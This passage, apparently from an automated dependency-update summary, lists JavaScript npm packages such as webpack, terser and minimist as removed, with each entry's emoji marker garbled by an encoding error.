๐Ÿ—‘๏ธ is-windows (removed)

๐Ÿ—‘๏ธ jest-worker (removed)

๐Ÿ—‘๏ธ js-types (removed)

๐Ÿ—‘๏ธ json-parse-better-errors (removed)

๐Ÿ—‘๏ธ jsonfile (removed)

๐Ÿ—‘๏ธ kind-of (removed)

๐Ÿ—‘๏ธ load-json-file (removed)

๐Ÿ—‘๏ธ loader-runner (removed)

๐Ÿ—‘๏ธ lodash-es (removed)

๐Ÿ—‘๏ธ lodash.clonedeep (removed)

๐Ÿ—‘๏ธ lodash.truncate (removed)

๐Ÿ—‘๏ธ lowercase-keys (removed)

๐Ÿ—‘๏ธ make-dir (removed)

๐Ÿ—‘๏ธ map-obj (removed)

๐Ÿ—‘๏ธ memory-fs (removed)

๐Ÿ—‘๏ธ merge-stream (removed)

๐Ÿ—‘๏ธ mimic-fn (removed)

๐Ÿ—‘๏ธ min-indent (removed)

๐Ÿ—‘๏ธ minimist (removed)

๐Ÿ—‘๏ธ minimist-options (removed)

๐Ÿ—‘๏ธ multimap (removed)

๐Ÿ—‘๏ธ neo-async (removed)

๐Ÿ—‘๏ธ normalize-package-data (removed)

๐Ÿ—‘๏ธ obj-props (removed)

๐Ÿ—‘๏ธ once (removed)

๐Ÿ—‘๏ธ onetime (removed)

๐Ÿ—‘๏ธ p-try (removed)

๐Ÿ—‘๏ธ path-is-absolute (removed)

๐Ÿ—‘๏ธ path-type (removed)

๐Ÿ—‘๏ธ pkg-up (removed)

๐Ÿ—‘๏ธ progress (removed)

๐Ÿ—‘๏ธ proto-props (removed)

๐Ÿ—‘๏ธ quick-lru (removed)

๐Ÿ—‘๏ธ randombytes (removed)

๐Ÿ—‘๏ธ read-pkg (removed)

๐Ÿ—‘๏ธ read-pkg-up (removed)

๐Ÿ—‘๏ธ redent (removed)

๐Ÿ—‘๏ธ regexpp (removed)

๐Ÿ—‘๏ธ require-from-string (removed)

๐Ÿ—‘๏ธ rimraf (removed)

๐Ÿ—‘๏ธ safe-regex (removed)

๐Ÿ—‘๏ธ schema-utils (removed)

๐Ÿ—‘๏ธ serialize-javascript (removed)

๐Ÿ—‘๏ธ slice-ansi (removed)

๐Ÿ—‘๏ธ source-map (removed)

๐Ÿ—‘๏ธ source-map-support (removed)

๐Ÿ—‘๏ธ spdx-correct (removed)

๐Ÿ—‘๏ธ spdx-exceptions (removed)

๐Ÿ—‘๏ธ spdx-expression-parse (removed)

๐Ÿ—‘๏ธ spdx-license-ids (removed)

๐Ÿ—‘๏ธ sprintf-js (removed)

๐Ÿ—‘๏ธ strip-bom (removed)

๐Ÿ—‘๏ธ table (removed)

๐Ÿ—‘๏ธ terser (removed)

๐Ÿ—‘๏ธ terser-webpack-plugin (removed)

๐Ÿ—‘๏ธ text-table (removed)

๐Ÿ—‘๏ธ to-absolute-glob (removed)

๐Ÿ—‘๏ธ to-fast-properties (removed)

๐Ÿ—‘๏ธ trim-newlines (removed)

๐Ÿ—‘๏ธ tsconfig-paths (removed)

๐Ÿ—‘๏ธ tsutils (removed)

๐Ÿ—‘๏ธ unc-path-regex (removed)

๐Ÿ—‘๏ธ universalify (removed)

๐Ÿ—‘๏ธ v8-compile-cache (removed)

๐Ÿ—‘๏ธ validate-npm-package-license (removed)

๐Ÿ—‘๏ธ watchpack (removed)

๐Ÿ—‘๏ธ webpack (removed)

๐Ÿ—‘๏ธ webpack-sources (removed)

๐Ÿ—‘๏ธ wrappy (removed)

๐Ÿ—‘๏ธ yaml (removed)

๐Ÿ—‘๏ธ yargs-parser (removed)